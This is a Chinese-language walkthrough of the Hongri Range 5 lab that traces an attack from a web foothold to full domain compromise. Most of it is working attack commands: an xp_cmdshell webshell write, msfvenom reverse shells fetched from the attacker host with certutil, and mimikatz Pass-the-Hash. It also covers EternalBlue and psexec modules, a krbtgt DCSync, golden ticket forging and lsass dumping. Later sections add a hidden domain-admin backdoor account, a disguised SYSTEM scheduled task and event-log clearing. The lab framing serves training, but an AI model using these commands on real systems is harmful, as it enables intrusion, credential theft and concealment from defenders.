红日靶场5实战:从外网突破到域控攻防的内网渗透全流程解析
2026/7/30 10:48:02 网站建设 项目流程

1. 项目概述:为什么红日靶场5是内网渗透的“必修课”

如果你对网络安全、渗透测试感兴趣,尤其是想深入Windows内网攻防这个领域,那么“红日靶场”这个名字你肯定不陌生。它不是一个商业产品,而是一个由国内安全爱好者自发搭建和维护的、高度仿真的实战演练环境。红日靶场5作为其系列中的经典之作,模拟了一个典型的企业内网环境:从一台暴露在公网边缘的Web服务器作为突破口,到内网横向移动,最终目标是攻陷整个域(Domain)的核心——域控制器(Domain Controller)。这个过程,几乎复刻了真实攻击中“由外到内,由点到面”的完整链条。

我之所以花时间折腾这个靶场,是因为它把很多抽象的概念给具象化了。你看再多的理论文章,都不如亲手把一条攻击路径打通来得深刻。比如,你知道了“永恒之蓝”(MS17-010)这个漏洞的编号,但你知道在内网里怎么用它来横向移动吗?你听说过“黄金票据”(Golden Ticket)和“白银票据”(Silver Ticket),但你知道在什么场景下用、具体命令怎么敲吗?红日靶场5就是这样一个“实验室”,它把这些知识点串联成一个有逻辑、有挑战的实战任务。

这个靶场适合所有想从“脚本小子”进阶为“内网渗透工程师”的朋友。无论你是刚学完基础Web渗透,想了解内网是怎么回事;还是已经有一定经验,但想系统化地梳理Windows域环境下的攻击手法,它都能给你带来巨大的提升。接下来,我就把我通关红日靶场5的完整过程、踩过的坑以及总结的技巧,毫无保留地分享给你。我们会从最开始的公网信息收集讲起,一步步打到域控,手把手带你走完整个流程。

2. 环境准备与靶场搭建:打造你的专属“练兵场”

工欲善其事,必先利其器。在开始“冲锋陷阵”之前,我们得先把战场布置好。红日靶场5通常以虚拟机镜像(.ova或.vmdk格式)的形式提供,你需要一个虚拟化软件来运行它。

2.1 虚拟化平台选择与网络配置

最常见的选择是VMware Workstation(或Player)和VirtualBox。我个人更倾向于VMware,因为它在网络配置和性能上更稳定,也更贴近企业虚拟化环境。下载好靶场镜像后,直接导入即可。

网络配置是第一个关键点。红日靶场5通常包含三台虚拟机:

  1. Windows 7 (x64):作为攻击者的跳板机或初始立足点,通常被配置为NAT模式,模拟一台已被初步控制的公网服务器。
  2. Windows Server 2008 (x64):内网中的一台重要服务器,可能是文件服务器或应用服务器。
  3. Windows Server 2003 (x64):最终目标——域控制器(DC)。

为了让这三台机器能互相通信,同时让我们的攻击机(通常是Kali Linux)能访问到它们,需要仔细设置网络。

  • 攻击机(Kali Linux):设置为NAT桥接模式,确保它能上网下载工具,并且能与Windows 7通信。
  • Windows 7:需要两张网卡。第一张网卡设为NAT(或桥接),用于连接攻击机(模拟公网入口)。第二张网卡设为仅主机模式(Host-Only),这张网卡将用于连接内网。
  • Windows Server 2008 & 2003:它们的网卡都设置为仅主机模式,并且要和Windows 7的第二张网卡在同一个仅主机模式的网络中(比如都使用VMnet1)。

这样,网络拓扑就清晰了:攻击机 -> (通过NAT网络) -> Windows 7 -> (通过仅主机网络) -> 内网(Win2008 & Win2003 DC)。Windows 7就成了我们进入内网的“桥头堡”。

注意:导入镜像后,务必检查每台虚拟机的网卡设置是否与上述规划一致。一个常见的坑是,虚拟机默认可能只启用了一张网卡,你需要手动为Windows 7添加第二张网卡并设置为仅主机模式

2.2 靶机初始化与信息记录

启动所有虚拟机后,不要急着攻击。先进行一些基本的初始化操作和信息记录,这能节省后面大量时间。

  1. 获取IP地址:登录到每台Windows虚拟机(默认账号密码通常在靶场说明文档里),打开命令行(cmd),输入ipconfig,记录下每台机器的IP地址。特别是Windows 7仅主机模式网卡上获取到的IP(例如192.168.xx.xx),这就是我们进入内网的网关IP。
  2. 关闭防火墙:为了降低初期演练的复杂度(专注于攻防手法本身),建议暂时关闭所有Windows虚拟机的防火墙。在命令行输入:
    netsh advfirewall set allprofiles state off
  3. 记录关键信息:准备一个文本文件,记录以下信息:
    • 各虚拟机IP(NAT网段、仅主机网段)。
    • 已知的弱口令或默认口令(如administrator/123456等,这是靶场为了练习设置的)。
    • 域的名称(通常启动Windows Server 2003后,在登录界面或系统属性里能看到,比如REDTEAM.LAB)。

做好这些,你的实战环境就准备好了。接下来,我们的攻击机Kali Linux将会登场,从外部对Windows 7发起第一波攻击。

3. 外网突破:寻找薄弱的第一道门

我们的攻击起点,是那台拥有双网卡、暴露在“公网”(对我们来说是NAT网络)的Windows 7机器。假设我们只知道它的IP地址,对它的其他情况一无所知。这就是一个典型的外部渗透测试开始场景。

3.1 信息收集与端口扫描

首先,用Kali Linux对Windows 7的IP进行全面的端口扫描,看看它开放了哪些服务。Nmap是首选工具。

# 快速扫描常见端口 nmap -sS -T4 <Windows_7_NAT_IP> # 全面扫描所有端口并尝试识别服务版本(速度较慢但详细) nmap -sS -sV -p- -T4 <Windows_7_NAT_IP>

扫描结果可能会显示开放了80端口(HTTP)、445端口(SMB)、3389端口(RDP)等。在红日靶场5的典型设置中,80端口上往往运行着一个存在漏洞的Web应用,这是我们最常见的突破口。

3.2 Web应用漏洞利用(以SQL注入为例)

假设扫描发现http://<Windows_7_IP>是一个网站。我们打开浏览器访问,可能是一个简单的登录页面或信息展示页面。接下来就是常规的Web渗透流程:

  1. 目录扫描:使用dirsearchgobuster寻找隐藏目录、后台管理页面等。
    dirsearch -u http://<Windows_7_IP> -e php,asp,aspx,jsp
  2. 漏洞探测:对发现的登录框、搜索框等交互点,测试SQL注入、XSS、命令注入等。例如,在一个新闻展示页面,URL可能是http://<Windows_7_IP>/news.php?id=1,我们可以尝试经典的注入测试id=1'id=1 and 1=2
  3. 获取Webshell:如果存在SQL注入且是MSSQL数据库(Windows服务器常用),可以尝试利用xp_cmdshell执行系统命令,进而写入一个Webshell文件到网站目录。例如,通过SQL注入执行:
    EXEC master..xp_cmdshell 'echo ^<%@ Page Language="C#" %^>^<%System.Diagnostics.Process process = new System.Diagnostics.Process();process.StartInfo.FileName = "cmd.exe";process.StartInfo.Arguments = "/c " + Request["c"];process.StartInfo.RedirectStandardOutput = true;process.StartInfo.UseShellExecute = false;process.Start();Response.Write(process.StandardOutput.ReadToEnd());%^> > C:\inetpub\wwwroot\cmd.aspx'
    这段命令(需根据实际情况调整路径和语法)会尝试写入一个简单的ASPX Webshell。成功后,访问http://<Windows_7_IP>/cmd.aspx?c=whoami,如果返回了命令执行结果(如nt authority\system),说明我们拿到了Windows 7服务器的系统权限。

实操心得:在真实环境中,xp_cmdshell可能被禁用,需要先启用。但在靶场中,为了降低难度,通常直接可用。如果不行,可以尝试其他方法,如利用SQL注入的UNION查询配合into outfile写文件(需知道绝对路径且有写权限),或者使用sqlmap--os-shell参数自动尝试多种getshell方式。

3.3 建立持久化通道与初步内网探测

通过Webshell执行命令是临时的,我们需要建立一个更稳定、功能更全的后门。通常使用MSFVenom生成一个反向Shell的Payload,然后在Webshell中下载并执行。

  1. 在Kali上生成Payload
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<你的Kali_IP> LPORT=4444 -f exe -o shell.exe
  2. 在Webshell中下载并执行
    # 在Webshell中执行 certutil -urlcache -split -f http://<你的Kali_IP>/shell.exe C:\Windows\Temp\shell.exe C:\Windows\Temp\shell.exe
  3. 在Kali上启动MSF监听
    msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <你的Kali_IP> set LPORT 4444 exploit
    如果一切顺利,你会获得一个Meterpreter会话。至此,我们成功突破了外网防线,在Windows 7上站稳了脚跟。接下来,就要以此为基础,向内网进发。

初步内网探测:在Meterpreter会话中,我们可以先收集Windows 7本身的信息。

# 获取系统信息 sysinfo # 获取当前权限 getuid # 查看网络接口和路由 run post/windows/manage/arp_scanner RHOSTS=192.168.xx.0/24 # 扫描内网网段 ipconfig

通过ipconfig,你能看到Windows 7在“仅主机网络”中的那个内网IP(比如192.168.52.143),以及它的内网网关。同时,用ARP扫描可以发现内网中存活的其他主机(Windows Server 20082003),假设它们的IP是192.168.52.138192.168.52.141。我们的内网之旅正式开启。

4. 内网横向移动:在“黑暗森林”中穿梭

拿到Windows 7的控制权后,我们相当于进入了内网。但此时的权限可能只是一个普通用户,或者虽然是SYSTEM权限,但仅限于Windows 7这一台机器。内网横向移动的目标是:获取内网中其他主机(特别是Windows Server 2008)的权限,并尽可能提升权限、收集凭证。

4.1 凭证收集与哈希传递(Pass the Hash)

在Windows域环境中,最宝贵的资产就是各种凭证(用户名和密码哈希)。我们首先在Windows 7上收集这些信息。

在Meterpreter会话中:

# 迁移到一个稳定的进程(如explorer.exe)中,避免会话因进程退出而丢失 ps # 查看进程列表 migrate <explorer.exe的PID> # 加载Mimikatz扩展来抓取哈希和明文密码 load kiwi creds_all

creds_all命令会尝试从内存中提取所有可用的登录凭证,包括LM/NTLM哈希和可能的明文密码。你可能会看到类似Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::这样的输出,这就是NTLM哈希。

假设我们抓取到了本地管理员Administrator的哈希,并且通过信息收集发现,内网中的Windows Server 2008(IP:192.168.52.138)也使用了相同的本地管理员密码(在小型网络或配置不当的系统中很常见)。那么,我们可以直接使用“哈希传递”(Pass-the-Hash, PtH)攻击,无需破解密码,直接用哈希登录。

# 在Meterpreter中,使用kiwi模块进行PtH kiwi_cmd sekurlsa::pth /user:Administrator /domain:WORKGROUP /ntlm:32ed87bdb5fdc5e9cba88547376818d4 # 注意:如果目标机器是域成员,/domain参数应为域名;如果是工作组,则为机器名或WORKGROUP。

执行后,会弹出一个新的cmd.exe窗口,这个窗口已经继承了刚刚注入的凭证。在这个新窗口里,我们可以尝试访问Windows Server 2008的共享或服务。

# 在新cmd中,使用net use建立IPC$连接 net use \\192.168.52.138\IPC$ /user:Administrator * # 当提示输入密码时,直接回车(因为我们已经通过哈希传递完成了认证) dir \\192.168.52.138\C$ # 如果连接成功,可以列出C盘目录

如果dir命令成功,说明我们已拥有Windows Server 2008的管理员权限。接下来就可以复制后门文件过去并执行,从而控制这台服务器。

4.2 利用永恒之蓝(MS17-010)进行横向移动

另一种常见情况是,抓取的哈希无法直接进行PtH,或者我们想尝试其他攻击面。这时,漏洞利用就派上用场了。Windows Server 2008如果没有及时打补丁,很可能存在“永恒之蓝”(MS17-010)漏洞。我们可以从Windows 7跳板机上直接对内网目标发起攻击。

首先,在Windows 7的Meterpreter会话中,添加通往内网的路由,让MSF的攻击模块能通过这个跳板打到内网机器。

# 查看当前网段 run get_local_subnets # 添加路由 (假设内网网段是192.168.52.0/24) run autoroute -s 192.168.52.0/24 # 查看路由是否添加成功 run autoroute -p

然后,在MSF控制台(另一个终端或background当前会话后)使用exploit/windows/smb/ms17_010_eternalblue模块。

# 在MSF中 use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.52.138 # 目标内网IP set payload windows/x64/meterpreter/bind_tcp # 因为是从内网跳板发起攻击,用bind_tcp set LPORT 4445 # 绑定端口 exploit

如果攻击成功,你会获得一个直接连接到Windows Server 2008的Meterpreter会话。至此,我们成功实现了从Windows 7Windows Server 2008的横向移动。

注意事项:永恒之蓝漏洞利用不稳定,可能导致目标系统蓝屏崩溃。在真实渗透测试中需谨慎使用,并做好授权。在靶场中则可以大胆尝试。如果失败,可以多试几次,或者尝试该漏洞的其他利用模块(如ms17_010_psexec)。

4.3 权限提升与信息深度收集

Windows Server 2008上获得初始Shell后(可能是普通用户权限),我们需要提权到SYSTEM。可以使用本地提权漏洞,也可以利用之前收集的凭证。这里假设我们通过永恒之蓝直接获得了SYSTEM权限。

接下来,在这台新控制的服务器上进行更深入的凭证收集,目标直指域账户。

# 在Windows Server 2008的Meterpreter会话中 load kiwi kiwi_cmd sekurlsa::logonpasswords

这次抓取,我们极有可能看到域账户的凭证!例如,一个域管理员REDTEAM\Administrator登录过这台服务器,其哈希或明文密码就会被抓取到。这是通往域控的“黄金钥匙”。

同时,进行内网信息收集,为攻击域控做准备:

# 获取网络信息 ipconfig /all route print # 查看ARP缓存,发现其他主机 arp -a # 使用MSF模块进行内网主机发现和端口扫描(通过已建立的路由) background # 将当前会话放到后台 use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.52.0/24 set PORTS 445,389,53,88 # 扫描域控常见端口:SMB, LDAP, DNS, Kerberos run

通过扫描,我们能确认域控制器(Windows Server 2003, IP:192.168.52.141)的存活和端口开放情况。

5. 域控攻防:夺取皇冠上的明珠

掌握了域管理员凭证后,攻击域控制器就有了多种选择。我们的目标是完全控制域控,证明我们已经掌控了整个域。

5.1 利用PsExec直接获取Shell

最直接的方式是使用PsExec,它利用SMB服务(445端口)和给定的凭证在远程系统上执行命令。我们已经有了域管理员哈希,可以直接使用。

在MSF中,我们可以使用exploit/windows/smb/psexec模块。

use exploit/windows/smb/psexec set RHOSTS 192.168.52.141 # 域控IP set SMBUser Administrator set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 # 这里填入抓取到的域管理员NTLM哈希 set SMBDomain REDTEAM set payload windows/x64/meterpreter/bind_tcp exploit

如果凭证正确且权限足够,MSF会尝试通过SMB服务在域控上创建服务并执行Payload,从而给我们返回一个域控的SYSTEM权限Shell。

5.2 黄金票据(Golden Ticket)攻击

这是一种更高级、更持久的权限维持方法。即使域管理员密码被更改,黄金票据在有效期内依然有效。要制作黄金票据,我们需要一个关键信息:域的KRBTGT账户的NTLM哈希。这个账户是域Kerberos认证服务的核心,其哈希极少更改。

首先,我们需要在域控(或任何拥有域控权限的主机,如我们已控制的Windows Server 2008)上获取KRBTGT的哈希。在域控的Meterpreter会话中(如果已获得):

load kiwi kiwi_cmd lsadump::dcsync /domain:REDTEAM.LAB /user:krbtgt

或者,在已获得域管理员权限的Windows Server 2008上,使用Mimikatz远程执行DCSync:

# 在Windows Server 2008的cmd中(通过PtH获得的那个) # 先上传mimikatz.exe mimikatz.exe "lsadump::dcsync /domain:REDTEAM.LAB /user:krbtgt" exit

命令输出中会包含KRBTGT账户的RC4-HMAC(即NTLM)哈希,记录下来。

然后,在攻击机Kali上,我们可以脱离MSF,使用impacket工具包中的ticketer.py来伪造黄金票据。

# 首先,获取域的SID。可以在域控或域成员上执行: # whoami /user 或者 wmic useraccount where name='Administrator' get sid # 假设域SID是:S-1-5-21-4156428301-2230187450-3897855176 python3 ticketer.py -nthash <KRBTGT的NTLM哈希> -domain-sid S-1-5-21-4156428301-2230187450-3897855176 -domain REDTEAM.LAB Administrator

这个命令会生成一个名为Administrator.ccache的票据文件。接下来,我们设置环境变量,让Linux系统使用这个票据进行Kerberos认证,然后使用impacketpsexecsmbexec等工具,无需密码即可连接域控。

export KRB5CCNAME=/path/to/Administrator.ccache python3 psexec.py -k -no-pass REDTEAM.LAB/Administrator@dc.redteam.lab # dc.redteam.lab是域控的主机名

-k参数表示使用Kerberos认证,-no-pass表示不需要密码。如果一切正常,你将直接获得域控的SYSTEM权限命令行。这证明了黄金票据的强大之处:它绕过了对密码的依赖,直接利用Kerberos协议本身的信任关系。

5.3 权限维持与痕迹清理

拿到域控权限后,渗透测试的主要目标已经达成。但在实战或更完整的演练中,我们还需要考虑如何维持访问权限以及清理痕迹。

  1. 创建隐藏后门账户:在域控上创建一个属于域管理员组、且不易被发现的账户。
    # 在域控shell中 net user eviladmin P@ssw0rd! /add /domain net group "Domain Admins" eviladmin /add /domain # 更隐蔽的做法:克隆现有管理员账户的SID,或者使用Skeleton Key(需要注入LSASS进程)
  2. 部署持久化后门:如计划任务、服务、WMI事件订阅、启动项等。例如,创建一个每小时运行一次的计划任务,连接回我们的C2服务器。
    schtasks /create /tn "WindowsUpdateCheck" /tr "C:\Windows\Temp\shell.exe" /sc hourly /mo 1 /ru SYSTEM
  3. 清理日志:使用wevtutil命令清除安全日志、系统日志等,但需注意,在高度安全的环境中,集中日志服务器可能已经记录了所有操作,本地清理无效。
    wevtutil cl Security wevtutil cl System

重要提醒:在靶场练习中,为了环境复用,可以不进行破坏性操作和深度痕迹清理。但在真实授权的渗透测试中,所有操作都必须严格遵守授权范围,并在测试结束后协助客户清理测试留下的后门和账户。

6. 常见问题与排查技巧实录

在整个红日靶场5的攻防演练中,你几乎一定会遇到各种问题。下面是我和很多同行踩过坑后总结出来的经验。

6.1 网络连通性问题

问题:Kali能ping通Windows 7的NAT IP,但Windows 7ping不通内网的其他机器(192.168.52.138/141)。排查

  1. 检查Windows 7的“仅主机模式”网卡是否已启用并获取到IP(ipconfig)。
  2. 检查Windows Server 2008/2003的网卡是否也设置在同一个仅主机模式网络(如VMnet1)。
  3. 检查所有虚拟机的防火墙是否已关闭。
  4. Windows 7上执行arp -a,看是否能发现内网其他主机的MAC地址。如果看不到,说明二层就不通,确认虚拟网络设置。

问题:MSF的autoroute添加了路由,但后续扫描模块还是发现不了内网主机。排查

  1. 使用run autoroute -p确认路由添加成功。
  2. 使用route print(在Meterpreter的shell中)查看跳板机自身的路由表,确保它有通往内网网段的路由。
  3. 尝试使用auxiliary/scanner/discovery/arp_sweep模块进行扫描,因为它基于ARP,不依赖路由。如果ARP能扫到,但TCP扫不到,可能是目标防火墙拦截。

6.2 漏洞利用失败问题

问题:永恒之蓝(MS17-010)利用模块总是失败,返回Target is not vulnerable或直接导致目标蓝屏。排查与技巧

  1. 确认目标是否真的存在漏洞:使用auxiliary/scanner/smb/smb_ms17_010模块先进行扫描确认。
  2. 尝试不同Payload和参数:将payloadwindows/x64/meterpreter/bind_tcp换成windows/x64/meterpreter/reverse_tcp,并正确设置LHOST(指向你的Kali IP)和LPORT。有时bind_tcp会被目标防火墙阻止。
  3. 使用备用利用模块:尝试exploit/windows/smb/ms17_010_psexec,它可能更稳定。
  4. 系统兼容性:某些Windows 7/2008 R2的版本可能需要特定版本的利用代码。确保你的Metasploit是最新版本。

问题:PsExec模块(exploit/windows/smb/psexec)失败,提示Login Failed排查

  1. 凭证问题:双重检查用户名、域名、密码/哈希是否正确。特别注意,如果使用哈希,格式必须是LMHASH:NTLMHASH,如果LM哈希未知,就用aad3b435b51404eeaad3b435b51404ee填充。
  2. 权限问题:确保使用的账户在目标机器上有管理员权限。在工作组环境中,需要的是目标机器的本地管理员;在域环境中,需要是域管理员或目标机器的本地管理员。
  3. SMB签名:如果目标服务器强制要求SMB签名,而你的连接未签名,也会失败。可以尝试在MSF中设置SMBDirectSMB::AlwaysSign选项,或者使用impacketsmbexec.py,它有时能更好地处理签名问题。

6.3 凭证相关与横向移动问题

问题:Mimikatz的sekurlsa::logonpasswords抓不到密码或哈希。排查与技巧

  1. 权限:必须以SYSTEM权限运行Mimikatz。在Meterpreter中先用getsystem提权,或迁移到lsass.exe进程(PID通常为500多)。
  2. 系统版本:高版本Windows(如Win10 1809之后, Server 2016之后)默认启用“受保护的进程”(Protected Process Light, PPL)保护lsass,使得常规内存读取失效。需要先绕过PPL,或使用其他方式如DCSync(需要域管理员权限)、SAM/SYSTEM文件转储等。
  3. 使用其他方法:在Meterpreter中,可以使用hashdump命令直接抓取本地SAM数据库中的哈希(但抓不到域缓存凭证)。或者上传procdump工具,将lsass.exe进程内存dump下来,下载到本地再用Mimikatz分析。
    # 在目标机上传procdump upload /usr/share/windows-resources/procdump/procdump.exe C:\\Windows\\Temp\\ # 在目标机shell中执行 C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass.exe lsass.dmp # 下载dump文件到Kali download lsass.dmp /tmp/ # 在Kali上用Mimikatz分析 python3 -m pypykatz lsa minidump /tmp/lsass.dmp

问题:哈希传递(PtH)成功,但无法访问目标共享或执行命令。排查

  1. 访问限制:目标可能设置了本地安全策略,限制了空会话或特定用户的网络访问。尝试使用net use建立IPC$连接后,使用sc命令远程创建服务来执行命令,这比直接访问文件共享更可靠。
    sc \\192.168.52.138 create EvilService binPath= "cmd /c C:\shell.exe" sc \\192.168.52.138 start EvilService
  2. 用户账户控制(UAC):远程PtH获得的令牌可能是一个“过滤的管理员令牌”,受UAC限制。可以尝试使用runas或计划任务来绕过。

6.4 域控相关与黄金票据问题

问题:DCSync操作失败,提示“访问被拒绝”。排查

  1. 权限不足:执行DCSync的账户必须拥有域控的Replicating Directory ChangesReplicating Directory Changes All权限。通常只有域管理员组、企业管理员组等高级别账户才有。确保你使用的账户是域管理员。
  2. 网络可达:确保从你执行DCSync的机器能访问域控的389(LDAP)端口。

问题:生成的黄金票据(.ccache文件)无法使用,psexec.py -k连接失败。排查

  1. 时间同步:Kerberos协议对时间非常敏感,要求客户端和KDC(域控)的时间差通常在5分钟内。确保你的Kali系统时间与域控时间同步。可以在Kali上安装ntpdate进行同步。
    sudo ntpdate <域控IP>
  2. 域名和主机名:确保生成票据时使用的域名(REDTEAM.LAB)和连接时使用的主机名(dc.redteam.lab)正确,且DNS解析正常。可以在Kali的/etc/hosts文件中手动添加解析。
    192.168.52.141 dc.redteam.lab
  3. 票据有效期:默认生成的票据有效期是10年,但可以检查一下。使用klist命令(需要安装krb5-user包)查看票据缓存信息。
  4. 尝试其他工具:如果impacketpsexec.py不行,可以试试wmiexec.pyatexec.py,它们也支持Kerberos认证。

整个红日靶场5的攻防链条走下来,你会发现内网渗透更像是一个“拼图”游戏。外网突破拿到一块拼图(跳板机),内网信息收集拿到几块(网络拓扑、IP、主机名),凭证抓取又拿到几块(本地哈希、域哈希),最后用合适的攻击手法(PtH、漏洞、票据)把这些拼图组合起来,最终完成夺取域控的完整画面。这个过程没有固定的唯一解,需要你根据实际情况灵活运用各种工具和技巧。多练几次,把每个环节的原理和替代方案都搞清楚,你面对真实内网时才会更有底气。

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询